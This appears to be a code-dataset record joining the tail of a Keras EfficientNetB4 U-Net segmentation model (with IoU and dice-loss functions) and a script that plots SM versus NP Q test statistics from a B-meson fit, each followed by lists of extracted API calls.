d1=keras.layers.UpSampling2D(size=(2,2))(uconv0)
d1 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d1)
d11=keras.layers.Activation('sigmoid',name='d1')(d1)
d2 = keras.layers.UpSampling2D(size=(4, 4))(uconv1)
d2 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d2)
d22 = keras.layers.Activation('sigmoid', name='d2')(d2)
d3 = keras.layers.UpSampling2D(size=(8, 8))(uconv2)
d3 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d3)
d33 = keras.layers.Activation('sigmoid', name='d3')(d3)
d4 = keras.layers.UpSampling2D(size=(16, 16))(uconv3)
d4 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d4)
d44 = keras.layers.Activation('sigmoid', name='d4')(d4)
d5 = keras.layers.UpSampling2D(size=(32, 32))(uconv4)
d5 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d5)
d55 = keras.layers.Activation('sigmoid', name='d5')(d5)
d = keras.layers.concatenate([d1, d2, d3, d4, d5,input])
d = keras.layers.Conv2D(1, kernel_size=3, activation=None, padding='same', use_bias=False)(d)
d = keras.layers.Activation('sigmoid', name='d')(d)
model = keras.models.Model(inputs=input,outputs=[d,d11,d22,d33,d44,d55])
#model.name = 'u-xception'
'''
Total params: 10,501,068
Trainable params: 10,435,420
Non-trainable params: 65,648
'''
return model
def get_iou_vector(A, B):
# Numpy version
batch_size = A.shape[0]
metric = 0.0
for batch in range(batch_size):
t, p = A[batch], B[batch]
true = np.sum(t)
pred = np.sum(p)
# deal with empty mask first
if true == 0:
metric += (pred == 0)
continue
# non empty mask case. Union is never empty
# hence it is safe to divide by its number of pixels
intersection = np.sum(t * p)
union = true + pred - intersection
iou = intersection / union
        # iou metric is a stepwise approximation of the real iou over 0.5
iou = np.floor(max(0, (iou - 0.45) * 20)) / 10
metric += iou
    # take the average over all images in the batch
metric /= batch_size
return metric
##
def IOU(label, pred):
# Tensorflow version
return tf.py_function (get_iou_vector, [label, pred > 0.5], tf.float64)
def dice_loss(y_true, y_pred):
smooth = 1.
y_true_f = keras.backend.flatten(y_true)
y_pred_f = keras.backend.flatten(y_pred)
intersection = y_true_f * y_pred_f
score = (2. * keras.backend.sum(intersection) + smooth) / (keras.backend.sum(y_true_f) + keras.backend.sum(y_pred_f) + smooth)
return 1. - score
##
def bce_dice_loss(y_true, y_pred):
return keras.losses.binary_crossentropy(y_true, y_pred) + dice_loss(y_true, y_pred)
def bce_logdice_loss(y_true, y_pred):
return keras.losses.binary_crossentropy(y_true, y_pred) - keras.backend.log(1. - dice_loss(y_true, y_pred))
#import tensorflow_addons as tfa
#tfa.losses.GIoULoss
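# A minimal usage sketch (the optimizer and fit call are illustrative; the
# model has six sigmoid outputs, so a single loss is applied to each output):
#
#   model = UEfficientNetB4(input_shape=(256, 256, 3), dropout_rate=0.5)
#   model.compile(optimizer='adam', loss=bce_dice_loss, metrics=[IOU])
#   # model.fit(x, [y, y, y, y, y, y], ...) with the same mask per output,
#   # or per-output targets if the deep supervision uses different masks.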
|
[
"tensorflow.py_function",
"tensorflow.keras.losses.binary_crossentropy",
"tensorflow.keras.backend.sum",
"efficientnet.tfkeras.EfficientNetB4",
"tensorflow.keras.backend.flatten",
"tensorflow.keras.layers.Conv2D",
"tensorflow.keras.layers.BatchNormalization",
"tensorflow.keras.layers.MaxPooling2D",
"tensorflow.keras.layers.Dropout",
"numpy.sum",
"tensorflow.keras.models.Model",
"tensorflow.keras.layers.LeakyReLU",
"tensorflow.keras.layers.concatenate",
"tensorflow.keras.layers.Activation",
"tensorflow.keras.layers.Conv2DTranspose",
"tensorflow.keras.layers.UpSampling2D",
"tensorflow.keras.layers.Add"
] |
[((1071, 1160), 'efficientnet.tfkeras.EfficientNetB4', 'EfficientNetB4', ([], {'weights': 'imagenet_weights', 'include_top': '(False)', 'input_shape': 'input_shape'}), '(weights=imagenet_weights, include_top=False, input_shape=\n input_shape)\n', (1085, 1160), False, 'from efficientnet.tfkeras import EfficientNetB4\n'), ((2198, 2240), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv4, conv4]'], {}), '([deconv4, conv4])\n', (2222, 2240), False, 'from tensorflow import keras\n'), ((2993, 3048), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv3, deconv4_up1, conv3]'], {}), '([deconv3, deconv4_up1, conv3])\n', (3017, 3048), False, 'from tensorflow import keras\n'), ((3674, 3742), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv2, deconv3_up1, deconv4_up2, conv2]'], {}), '([deconv2, deconv3_up1, deconv4_up2, conv2])\n', (3698, 3742), False, 'from tensorflow import keras\n'), ((4235, 4320), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv1, deconv2_up1, deconv3_up2, deconv4_up3, conv1]'], {}), '([deconv1, deconv2_up1, deconv3_up2, deconv4_up3,\n conv1])\n', (4259, 4320), False, 'from tensorflow import keras\n'), ((6217, 6270), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[d1, d2, d3, d4, d5, input]'], {}), '([d1, d2, d3, d4, d5, input])\n', (6241, 6270), False, 'from tensorflow import keras\n'), ((6439, 6509), 'tensorflow.keras.models.Model', 'keras.models.Model', ([], {'inputs': 'input', 'outputs': '[d, d11, d22, d33, d44, d55]'}), '(inputs=input, outputs=[d, d11, d22, d33, d44, d55])\n', (6457, 6509), False, 'from tensorflow import keras\n'), ((7572, 7635), 'tensorflow.py_function', 'tf.py_function', (['get_iou_vector', '[label, pred > 0.5]', 'tf.float64'], {}), '(get_iou_vector, [label, pred > 0.5], tf.float64)\n', (7586, 7635), True, 'import tensorflow as tf\n'), ((7706, 7735), 'tensorflow.keras.backend.flatten', 'keras.backend.flatten', (['y_true'], {}), '(y_true)\n', (7727, 7735), False, 'from tensorflow import keras\n'), ((7752, 7781), 'tensorflow.keras.backend.flatten', 'keras.backend.flatten', (['y_pred'], {}), '(y_pred)\n', (7773, 7781), False, 'from tensorflow import keras\n'), ((352, 420), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['filters', 'size'], {'strides': 'strides', 'padding': 'padding'}), '(filters, size, strides=strides, padding=padding)\n', (371, 420), False, 'from tensorflow import keras\n'), ((433, 466), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (464, 466), False, 'from tensorflow import keras\n'), ((622, 655), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (644, 655), False, 'from tensorflow import keras\n'), ((677, 710), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (708, 710), False, 'from tensorflow import keras\n'), ((732, 765), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (763, 765), False, 'from tensorflow import keras\n'), ((906, 924), 'tensorflow.keras.layers.Add', 'keras.layers.Add', ([], {}), '()\n', (922, 924), False, 'from tensorflow import keras\n'), ((1261, 1294), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (1283, 1294), False, 'from tensorflow import keras\n'), ((1315, 1348), 'tensorflow.keras.layers.MaxPooling2D', 
'keras.layers.MaxPooling2D', (['(2, 2)'], {}), '((2, 2))\n', (1340, 1348), False, 'from tensorflow import keras\n'), ((1369, 1403), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['dropout_rate'], {}), '(dropout_rate)\n', (1389, 1403), False, 'from tensorflow import keras\n'), ((1440, 1545), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 32)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""', 'name': '"""conv_middle"""'}), "(start_neurons * 32, (3, 3), activation=None, padding=\n 'same', name='conv_middle')\n", (1459, 1545), False, 'from tensorflow import keras\n'), ((1671, 1704), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (1693, 1704), False, 'from tensorflow import keras\n'), ((1729, 1821), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (1757, 1821), False, 'from tensorflow import keras\n'), ((1844, 1936), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (1872, 1936), False, 'from tensorflow import keras\n'), ((1961, 2053), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (1989, 2053), False, 'from tensorflow import keras\n'), ((2082, 2174), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (2110, 2174), False, 'from tensorflow import keras\n'), ((2255, 2289), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['dropout_rate'], {}), '(dropout_rate)\n', (2275, 2289), False, 'from tensorflow import keras\n'), ((2314, 2399), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 16)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), activation=None, padding='same'\n )\n", (2333, 2399), False, 'from tensorflow import keras\n'), ((2536, 2569), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (2558, 2569), False, 'from tensorflow import keras\n'), ((2606, 2697), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 8)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), strides=(2, 2),\n padding='same')\n", (2634, 2697), False, 'from tensorflow import keras\n'), ((2721, 2812), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 8)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), strides=(2, 2),\n padding='same')\n", (2749, 2812), False, 'from tensorflow import keras\n'), ((2837, 2928), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 8)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), strides=(2, 2),\n padding='same')\n", (2865, 2928), False, 'from tensorflow import keras\n'), ((3063, 3097), 
'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['dropout_rate'], {}), '(dropout_rate)\n', (3083, 3097), False, 'from tensorflow import keras\n'), ((3122, 3201), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 8)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), activation=None, padding='same')\n", (3141, 3201), False, 'from tensorflow import keras\n'), ((3341, 3374), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (3363, 3374), False, 'from tensorflow import keras\n'), ((3400, 3491), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 4)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 4, (3, 3), strides=(2, 2),\n padding='same')\n", (3428, 3491), False, 'from tensorflow import keras\n'), ((3515, 3606), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 4)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 4, (3, 3), strides=(2, 2),\n padding='same')\n", (3543, 3606), False, 'from tensorflow import keras\n'), ((3759, 3784), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.1)'], {}), '(0.1)\n', (3779, 3784), False, 'from tensorflow import keras\n'), ((3807, 3886), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 4)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 4, (3, 3), activation=None, padding='same')\n", (3826, 3886), False, 'from tensorflow import keras\n'), ((4026, 4059), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (4048, 4059), False, 'from tensorflow import keras\n'), ((4085, 4176), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 2)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 2, (3, 3), strides=(2, 2),\n padding='same')\n", (4113, 4176), False, 'from tensorflow import keras\n'), ((4333, 4358), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.1)'], {}), '(0.1)\n', (4353, 4358), False, 'from tensorflow import keras\n'), ((4381, 4460), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 2)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 2, (3, 3), activation=None, padding='same')\n", (4400, 4460), False, 'from tensorflow import keras\n'), ((4600, 4633), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (4622, 4633), False, 'from tensorflow import keras\n'), ((4658, 4749), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 1)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 1, (3, 3), strides=(2, 2),\n padding='same')\n", (4686, 4749), False, 'from tensorflow import keras\n'), ((4768, 4793), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.1)'], {}), '(0.1)\n', (4788, 4793), False, 'from tensorflow import keras\n'), ((4816, 4895), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 1)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 1, (3, 3), activation=None, padding='same')\n", (4835, 4895), False, 'from tensorflow import keras\n'), ((5035, 5068), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', 
([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (5057, 5068), False, 'from tensorflow import keras\n'), ((5091, 5129), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(dropout_rate / 2)'], {}), '(dropout_rate / 2)\n', (5111, 5129), False, 'from tensorflow import keras\n'), ((5148, 5186), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 2))\n', (5173, 5186), False, 'from tensorflow import keras\n'), ((5204, 5283), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5223, 5283), False, 'from tensorflow import keras\n'), ((5297, 5342), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d1"""'}), "('sigmoid', name='d1')\n", (5320, 5342), False, 'from tensorflow import keras\n'), ((5358, 5396), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(4, 4)'}), '(size=(4, 4))\n', (5383, 5396), False, 'from tensorflow import keras\n'), ((5415, 5494), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5434, 5494), False, 'from tensorflow import keras\n'), ((5510, 5555), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d2"""'}), "('sigmoid', name='d2')\n", (5533, 5555), False, 'from tensorflow import keras\n'), ((5572, 5610), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(8, 8)'}), '(size=(8, 8))\n', (5597, 5610), False, 'from tensorflow import keras\n'), ((5629, 5708), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5648, 5708), False, 'from tensorflow import keras\n'), ((5724, 5769), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d3"""'}), "('sigmoid', name='d3')\n", (5747, 5769), False, 'from tensorflow import keras\n'), ((5786, 5826), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(16, 16)'}), '(size=(16, 16))\n', (5811, 5826), False, 'from tensorflow import keras\n'), ((5845, 5924), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5864, 5924), False, 'from tensorflow import keras\n'), ((5940, 5985), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d4"""'}), "('sigmoid', name='d4')\n", (5963, 5985), False, 'from tensorflow import keras\n'), ((6002, 6042), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(32, 32)'}), '(size=(32, 32))\n', (6027, 6042), False, 'from tensorflow import keras\n'), ((6061, 6140), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (6080, 6140), False, 'from tensorflow import keras\n'), ((6156, 6201), 'tensorflow.keras.layers.Activation', 
'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d5"""'}), "('sigmoid', name='d5')\n", (6179, 6201), False, 'from tensorflow import keras\n'), ((6279, 6369), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)'], {'kernel_size': '(3)', 'activation': 'None', 'padding': '"""same"""', 'use_bias': '(False)'}), "(1, kernel_size=3, activation=None, padding='same',\n use_bias=False)\n", (6298, 6369), False, 'from tensorflow import keras\n'), ((6378, 6422), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d"""'}), "('sigmoid', name='d')\n", (6401, 6422), False, 'from tensorflow import keras\n'), ((6857, 6866), 'numpy.sum', 'np.sum', (['t'], {}), '(t)\n', (6863, 6866), True, 'import numpy as np\n'), ((6883, 6892), 'numpy.sum', 'np.sum', (['p'], {}), '(p)\n', (6889, 6892), True, 'import numpy as np\n'), ((7155, 7168), 'numpy.sum', 'np.sum', (['(t * p)'], {}), '(t * p)\n', (7161, 7168), True, 'import numpy as np\n'), ((8029, 8077), 'tensorflow.keras.losses.binary_crossentropy', 'keras.losses.binary_crossentropy', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (8061, 8077), False, 'from tensorflow import keras\n'), ((8159, 8207), 'tensorflow.keras.losses.binary_crossentropy', 'keras.losses.binary_crossentropy', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (8191, 8207), False, 'from tensorflow import keras\n'), ((511, 544), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (533, 544), False, 'from tensorflow import keras\n'), ((7841, 7872), 'tensorflow.keras.backend.sum', 'keras.backend.sum', (['intersection'], {}), '(intersection)\n', (7858, 7872), False, 'from tensorflow import keras\n'), ((7886, 7913), 'tensorflow.keras.backend.sum', 'keras.backend.sum', (['y_true_f'], {}), '(y_true_f)\n', (7903, 7913), False, 'from tensorflow import keras\n'), ((7916, 7943), 'tensorflow.keras.backend.sum', 'keras.backend.sum', (['y_pred_f'], {}), '(y_pred_f)\n', (7933, 7943), False, 'from tensorflow import keras\n')]
|
#!/usr/bin/env python
"""Plot Q test statistics"""
import argparse
import csv
import math
import matplotlib
import numpy as np
import shutil
import tensorflow.compat.v2 as tf
import b_meson_fit as bmf
tf.enable_v2_behavior()
def read_q_stats(csv_path):
"""Return list of Q stats from file"""
q_list = []
with open(csv_path, newline='') as csv_file:
reader = csv.DictReader(csv_file)
for row in reader:
q_list.append(float(row['q']))
return q_list
def gaussian(x_list_, data):
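    """Moment-based Gaussian fit: the mean and width are the data-weighted
    average and standard deviation of x_list_, and the curve is scaled to the
    maximum histogram value."""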
data_max = max(data)
x = np.sum(x_list_ * data) / np.sum(data)
width = np.sqrt(np.abs(np.sum((x_list_ - x) ** 2 * data) / np.sum(data)))
return data_max * np.exp(-(x_list_ - x) ** 2 / (2 * width ** 2))
columns = shutil.get_terminal_size().columns
parser = argparse.ArgumentParser(
description='Plot Q test statistics.',
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=columns, width=columns),
)
parser.add_argument(
'-b',
'--bins',
dest='bins',
type=int,
default=100,
help='Number of histogram bins (default: 100)',
)
parser.add_argument(
'-d',
'--device',
dest='device',
default=bmf.Script.device_default,
help='use this device e.g. CPU:0, GPU:0, GPU:1 (default: {})'.format(bmf.Script.device_default),
)
parser.add_argument(
'-w',
'--write-svg',
dest='write_svg',
metavar='SVG_PATH',
help='write plot as SVG using this filepath'
)
parser.add_argument(
dest='sm_filepath',
metavar='SM_FILEPATH',
help='Path to SM CSV file'
)
parser.add_argument(
dest='np_filepath',
metavar='NP_FILEPATH',
help='Path to NP CSV file'
)
args = parser.parse_args()
with bmf.Script(device=args.device) as script:
if args.write_svg is not None:
matplotlib.use('SVG')
# Import these after we optionally set SVG backend - otherwise matplotlib may bail on a missing TK backend when
# running from the CLI
import matplotlib.pylab as plt
import seaborn as sns
# Load data
sm_data = read_q_stats(args.sm_filepath)
np_data = read_q_stats(args.np_filepath)
    # Max -/+ x-axis scale (rounded up to the nearest 25)
combined_data = sm_data + np_data
max_point = max(max(combined_data), -min(combined_data))
x_max = 25 * math.ceil(max_point / 25)
# Histogram bins to use
bins = np.linspace(-x_max, x_max, args.bins)
# Bin midpoints for x-axis
x_list = (bins[1:] + bins[:-1]) / 2
sm_hist = np.histogram(sm_data, bins=bins, density=True)
np_hist = np.histogram(np_data, bins=bins, density=True)
np_median = np.median(np_data)
sm_gaussian = gaussian(x_list, sm_hist[0])
# Calculate sigma confidence level
sm_mean = np.mean(sm_data)
sm_stddev = np.std(sm_data)
sigma_level = (sm_mean - np_median) / sm_stddev
bmf.stdout('mean: {} stddev: {} sigma level: {}'.format(sm_mean, sm_stddev, sigma_level))
plt.figure()
# Set style as well as font to Computer Modern Roman to match LaTeX output
sns.set(style='ticks', font='cmr10', rc={'mathtext.fontset': 'cm', 'axes.unicode_minus': False})
# Blue open circles for SM data. Don't plot 0 values
plt.scatter(
x_list,
[np.nan if x == 0 else x for x in sm_hist[0]],
facecolors='none',
edgecolors='b',
s=15,
label='SM'
)
# Red closed circles for NP data. Don't plot 0 values
plt.scatter(x_list, [np.nan if x == 0 else x for x in np_hist[0]], color='r', s=15, label='NP')
# Blue solid line for SM Gaussian
plt.plot(x_list, sm_gaussian, color='b', label='SM fit')
# Red dashed line for NP median
plt.gca().axvline(np_median, color='r', linestyle=':', label='NP median')
# Calculate the y-min by finding the y-axis order of magnitude just before the NP median, rounding down,
# and dropping 1 more order of magnitude
x_idx_just_before_np_median = len(list(filter(lambda x: x < np_median, x_list))) - 1
gaussian_val_just_before_np_median = sm_gaussian[x_idx_just_before_np_median]
val_mag_just_before_np_median = math.floor(math.log(gaussian_val_just_before_np_median, 10))
y_min = float('1e{}'.format(val_mag_just_before_np_median - 1))
# Calculate the y-max by finding the highest y-axis and rounding up to the next order of magnitude
max_fraction = max(sm_hist[0] + np_hist[0])
max_fraction_mag = math.ceil(math.log(max_fraction, 10))
y_max = float('1e{}'.format(max_fraction_mag))
bmf.stdout('Setting x scale from {} to {}'.format(-x_max, x_max))
plt.xlim(-x_max, x_max)
bmf.stdout('Setting y scale from {} to {}'.format(y_min, y_max))
plt.ylim(y_min, y_max)
plt.xlabel('Q')
plt.ylabel('Fraction / bin')
plt.yscale('log')
# Show legend in order NP, NP median, SM, SM fit
handles, labels = plt.gca().get_legend_handles_labels()
order = [3, 1, 2, 0]
plt.legend([handles[idx] for idx in order], [labels[idx] for idx in order])
if args.write_svg is not None:
filepath = args.write_svg
bmf.stdout('Writing {}'.format(filepath))
plt.savefig(filepath, format='svg', bbox_inches='tight')
else:
plt.show()
|
[
"numpy.sum",
"matplotlib.pylab.gca",
"numpy.histogram",
"numpy.mean",
"numpy.exp",
"matplotlib.pylab.figure",
"matplotlib.pylab.show",
"matplotlib.pylab.scatter",
"matplotlib.pylab.legend",
"numpy.std",
"shutil.get_terminal_size",
"argparse.HelpFormatter",
"numpy.linspace",
"math.log",
"seaborn.set",
"matplotlib.pylab.savefig",
"math.ceil",
"numpy.median",
"csv.DictReader",
"matplotlib.pylab.yscale",
"matplotlib.pylab.plot",
"matplotlib.use",
"matplotlib.pylab.xlim",
"matplotlib.pylab.ylim",
"matplotlib.pylab.ylabel",
"matplotlib.pylab.xlabel",
"b_meson_fit.Script",
"tensorflow.compat.v2.enable_v2_behavior"
] |
[((203, 226), 'tensorflow.compat.v2.enable_v2_behavior', 'tf.enable_v2_behavior', ([], {}), '()\n', (224, 226), True, 'import tensorflow.compat.v2 as tf\n'), ((757, 783), 'shutil.get_terminal_size', 'shutil.get_terminal_size', ([], {}), '()\n', (781, 783), False, 'import shutil\n'), ((1722, 1752), 'b_meson_fit.Script', 'bmf.Script', ([], {'device': 'args.device'}), '(device=args.device)\n', (1732, 1752), True, 'import b_meson_fit as bmf\n'), ((2379, 2416), 'numpy.linspace', 'np.linspace', (['(-x_max)', 'x_max', 'args.bins'], {}), '(-x_max, x_max, args.bins)\n', (2390, 2416), True, 'import numpy as np\n'), ((2504, 2550), 'numpy.histogram', 'np.histogram', (['sm_data'], {'bins': 'bins', 'density': '(True)'}), '(sm_data, bins=bins, density=True)\n', (2516, 2550), True, 'import numpy as np\n'), ((2565, 2611), 'numpy.histogram', 'np.histogram', (['np_data'], {'bins': 'bins', 'density': '(True)'}), '(np_data, bins=bins, density=True)\n', (2577, 2611), True, 'import numpy as np\n'), ((2628, 2646), 'numpy.median', 'np.median', (['np_data'], {}), '(np_data)\n', (2637, 2646), True, 'import numpy as np\n'), ((2748, 2764), 'numpy.mean', 'np.mean', (['sm_data'], {}), '(sm_data)\n', (2755, 2764), True, 'import numpy as np\n'), ((2781, 2796), 'numpy.std', 'np.std', (['sm_data'], {}), '(sm_data)\n', (2787, 2796), True, 'import numpy as np\n'), ((2948, 2960), 'matplotlib.pylab.figure', 'plt.figure', ([], {}), '()\n', (2958, 2960), True, 'import matplotlib.pylab as plt\n'), ((3044, 3144), 'seaborn.set', 'sns.set', ([], {'style': '"""ticks"""', 'font': '"""cmr10"""', 'rc': "{'mathtext.fontset': 'cm', 'axes.unicode_minus': False}"}), "(style='ticks', font='cmr10', rc={'mathtext.fontset': 'cm',\n 'axes.unicode_minus': False})\n", (3051, 3144), True, 'import seaborn as sns\n'), ((3203, 3328), 'matplotlib.pylab.scatter', 'plt.scatter', (['x_list', '[(np.nan if x == 0 else x) for x in sm_hist[0]]'], {'facecolors': '"""none"""', 'edgecolors': '"""b"""', 's': '(15)', 'label': '"""SM"""'}), "(x_list, [(np.nan if x == 0 else x) for x in sm_hist[0]],\n facecolors='none', edgecolors='b', s=15, label='SM')\n", (3214, 3328), True, 'import matplotlib.pylab as plt\n'), ((3440, 3542), 'matplotlib.pylab.scatter', 'plt.scatter', (['x_list', '[(np.nan if x == 0 else x) for x in np_hist[0]]'], {'color': '"""r"""', 's': '(15)', 'label': '"""NP"""'}), "(x_list, [(np.nan if x == 0 else x) for x in np_hist[0]], color=\n 'r', s=15, label='NP')\n", (3451, 3542), True, 'import matplotlib.pylab as plt\n'), ((3579, 3635), 'matplotlib.pylab.plot', 'plt.plot', (['x_list', 'sm_gaussian'], {'color': '"""b"""', 'label': '"""SM fit"""'}), "(x_list, sm_gaussian, color='b', label='SM fit')\n", (3587, 3635), True, 'import matplotlib.pylab as plt\n'), ((4582, 4605), 'matplotlib.pylab.xlim', 'plt.xlim', (['(-x_max)', 'x_max'], {}), '(-x_max, x_max)\n', (4590, 4605), True, 'import matplotlib.pylab as plt\n'), ((4679, 4701), 'matplotlib.pylab.ylim', 'plt.ylim', (['y_min', 'y_max'], {}), '(y_min, y_max)\n', (4687, 4701), True, 'import matplotlib.pylab as plt\n'), ((4706, 4721), 'matplotlib.pylab.xlabel', 'plt.xlabel', (['"""Q"""'], {}), "('Q')\n", (4716, 4721), True, 'import matplotlib.pylab as plt\n'), ((4726, 4754), 'matplotlib.pylab.ylabel', 